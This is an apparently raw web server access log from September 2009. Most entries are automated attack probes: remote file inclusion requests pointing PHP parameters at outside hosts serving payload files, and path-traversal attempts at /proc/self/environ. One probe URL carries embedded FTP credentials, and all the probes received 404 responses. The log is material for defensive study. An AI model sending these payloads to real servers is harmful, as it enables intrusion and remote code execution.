94.23.24.65 - - [23/Sep/2009:23:00:00 -0500] "GET //index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:00 -0500] "GET /logs//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:00 -0500] "GET /logs/access_log.1240617600//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
211.47.71.89 - - [23/Sep/2009:23:00:04 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://h1.ripway.com/ilos/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.23.24.65 - - [23/Sep/2009:23:00:04 -0500] "GET /logs/access_log.1240012800//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:04 -0500] "GET /logs//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:04 -0500] "GET //index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:04 -0500] "GET /logs/access_log.1240617600//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
211.47.71.89 - - [23/Sep/2009:23:00:05 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://h1.ripway.com/ilos/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:00:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:00:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:00:09 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.47.71.89 - - [23/Sep/2009:23:00:11 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://h1.ripway.com/ilos/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.23.24.65 - - [23/Sep/2009:23:00:27 -0500] "GET /logs/access_log.1239926400//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:27 -0500] "GET /logs/access_log.1240012800//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:37 -0500] "GET /logs/access_log.1244764800//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:00:57 -0500] "GET /logs/access_log.1244764800//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
61.100.5.136 - - [23/Sep/2009:23:01:27 -0500] "GET /error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:23:01:27 -0500] "GET /logs/access_log.1250294400/error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:23:01:27 -0500] "GET /logs/error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:23:01:30 -0500] "GET /logs/error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:23:01:30 -0500] "GET /logs/access_log.1250294400/error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:23:01:30 -0500] "GET /error.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
94.23.24.65 - - [23/Sep/2009:23:01:35 -0500] "GET /logs/access_log.1242086400//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:01:43 -0500] "GET /logs/access_log.1242086400//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:01:49 -0500] "GET /logs/access_log.1241568000//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:02:00 -0500] "GET /logs/access_log.1241568000//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.24.65 - - [23/Sep/2009:23:02:00 -0500] "GET /logs/access_log.1239926400//index.php?meio.php=http://www.toke-photo.dk/dlk/info.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
65.55.207.70 - - [23/Sep/2009:23:02:29 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.24 - - [23/Sep/2009:23:03:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:03:14 -0500] "GET /logs/access_log.1243814400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:03:14 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:03:23 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.207.78 - - [23/Sep/2009:23:03:29 -0500] "GET /logs/access_log.1221091200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.55.128.16 - - [23/Sep/2009:23:04:46 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:04:46 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:04:46 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:23:04:46 -0500] "GET /logs/access_log.1233532800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.106.182 - - [23/Sep/2009:23:04:59 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.187 - - [23/Sep/2009:23:10:29 -0500] "GET /logs/access_log.1242345600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [23/Sep/2009:23:10:37 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.225.23.4 - - [23/Sep/2009:23:10:37 -0500] "GET /setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [23/Sep/2009:23:10:37 -0500] "GET /logs/access_log.1244764800/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [23/Sep/2009:23:10:42 -0500] "GET /logs/access_log.1250726400/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.211 - - [23/Sep/2009:23:12:00 -0500] "GET /logs/access_log.1242000000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.30.142.107 - - [23/Sep/2009:23:17:24 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.107 - - [23/Sep/2009:23:17:29 -0500] "GET /logs/?M=A HTTP/1.0" 200 205874 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.181 - - [23/Sep/2009:23:18:30 -0500] "GET /logs/access_log.1245801600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.24 - - [23/Sep/2009:23:18:33 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:18:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:18:33 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:18:36 -0500] "GET /logs/access_log.1244764800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:19:12 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:19:12 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:19:12 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:19:14 -0500] "GET /logs/access_log.1244764800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.207 - - [23/Sep/2009:23:22:28 -0500] "GET /logs/access_log.1244592000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.24 - - [23/Sep/2009:23:26:05 -0500] "GET /logs/access_log.1249776000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.113 - - [23/Sep/2009:23:26:28 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.185 - - [23/Sep/2009:23:28:00 -0500] "GET /logs/access_log.1154217600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.131 - - [23/Sep/2009:23:29:33 -0500] "GET /logs/access_log.1195171200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.159 - - [23/Sep/2009:23:30:30 -0500] "GET /logs/access_log.1167264000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.115 - - [23/Sep/2009:23:30:59 -0500] "GET /logs/access_log.1146355200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.24 - - [23/Sep/2009:23:35:41 -0500] "GET /logs/access_log.1249776000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.18.169.181 - - [23/Sep/2009:23:42:24 -0500] "GET /logs/access_log.1250812800/hall.php?file=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.18.169.181 - - [23/Sep/2009:23:42:24 -0500] "GET /logs/hall.php?file=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
65.18.169.181 - - [23/Sep/2009:23:42:24 -0500] "GET /logs/access_log.1250380800/hall.php?file=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.18.169.181 - - [23/Sep/2009:23:44:02 -0500] "GET /hall.php?file=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.162.94.221 - - [23/Sep/2009:23:46:45 -0500] "GET /logs/access_log.1243728000//index.php?include=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.162.94.221 - - [23/Sep/2009:23:46:45 -0500] "GET //index.php?include=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.162.94.221 - - [23/Sep/2009:23:46:51 -0500] "GET /logs//index.php?include=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.48.121.149 - - [23/Sep/2009:23:47:04 -0500] "GET /logs//ask_password?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.48.121.149 - - [23/Sep/2009:23:47:04 -0500] "GET //ask_password?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.48.121.149 - - [23/Sep/2009:23:47:04 -0500] "GET /logs/access_log.1250899200//ask_password?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.23.197.26 - - [23/Sep/2009:23:47:26 -0500] "GET /logs/index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [23/Sep/2009:23:47:26 -0500] "GET /logs/access_log.1252195200/index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [23/Sep/2009:23:47:26 -0500] "GET /index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [23/Sep/2009:23:47:37 -0500] "GET /index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
94.23.197.26 - - [23/Sep/2009:23:47:37 -0500] "GET /logs/index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
94.23.197.26 - - [23/Sep/2009:23:47:37 -0500] "GET /logs/access_log.1252195200/index.php?Load=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.48.121.149 - - [23/Sep/2009:23:48:00 -0500] "GET /logs/access_log.1250726400//ask_password?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:42 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:42 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:42 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.94.26.167 - - [23/Sep/2009:23:49:48 -0500] "GET /home.php?index=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.94.26.167 - - [23/Sep/2009:23:49:48 -0500] "GET /logs/home.php?index=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.94.26.167 - - [23/Sep/2009:23:49:48 -0500] "GET /logs/access_log.1240617600/home.php?index=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:53 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:53 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:49:53 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:50:09 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:23:50:17 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:23:53:04 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:23:53:04 -0500] "GET /logs/access_log.1249603200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:23:53:04 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.249.71.42 - - [24/Sep/2009:00:00:45 -0500] "GET /logs/access_log.1234224000 HTTP/1.1" 200 127661 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.93.2.80 - - [24/Sep/2009:00:05:42 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.93.2.80 - - [24/Sep/2009:00:05:42 -0500] "GET /logs/access_log.1250294400/errors.php?error=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.93.2.80 - - [24/Sep/2009:00:05:42 -0500] "GET /errors.php?error=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.93.2.80 - - [24/Sep/2009:00:05:42 -0500] "GET /logs/errors.php?error=http://cyb3r0s.fileave.com/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.232.143.55 - - [24/Sep/2009:00:07:17 -0500] "GET /logs///vwar/backup/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.232.143.55 - - [24/Sep/2009:00:07:17 -0500] "GET ///vwar/backup/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
66.232.143.55 - - [24/Sep/2009:00:07:17 -0500] "GET /logs/access_log.1228608000///vwar/backup/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
65.55.207.51 - - [24/Sep/2009:00:07:28 -0500] "GET /logs/access_log.1125964800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.203 - - [24/Sep/2009:00:08:01 -0500] "GET /logs/access_log.1138924800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.155.5.84 - - [24/Sep/2009:00:13:31 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:00:13:31 -0500] "GET /logs/access_log.1241049600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:00:13:32 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:00:15:03 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:00:15:23 -0500] "GET /logs/access_log.1251244800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:00:16:27 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:00:16:38 -0500] "GET /logs/access_log.1251244800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:15 -0500] "GET /setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:15 -0500] "GET /logs/access_log.1236211200/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:15 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:21 -0500] "GET /setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:22 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:22 -0500] "GET /logs/access_log.1236211200/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:34 -0500] "GET /logs/access_log.1237507200/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:21:42 -0500] "GET /logs/access_log.1237507200/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:00:22:04 -0500] "GET /logs/access_log.1236211200/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:00:22:04 -0500] "GET /logs/access_log.1238284800/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:00:22:04 -0500] "GET /setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:00:22:04 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:00:22:45 -0500] "GET /setup.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:00:22:45 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:00:22:45 -0500] "GET /logs/access_log.1236211200/setup.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:00:22:45 -0500] "GET /logs/access_log.1238284800/setup.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.207.138 - - [24/Sep/2009:00:24:00 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [24/Sep/2009:00:25:43 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.88.31.247 - - [24/Sep/2009:00:25:55 -0500] "GET /logs/access_log.1235088000 HTTP/1.1" 200 140698 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.207.46 - - [24/Sep/2009:00:26:29 -0500] "GET /_vti_cnf/?D=A HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [24/Sep/2009:00:28:00 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.5.136 - - [24/Sep/2009:00:35:07 -0500] "GET /logs/access_log.1238284800/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:00:35:18 -0500] "GET /logs/access_log.1238284800/setup.php?setup[use_category]=1&dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:00:36:01 -0500] "GET /setup.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
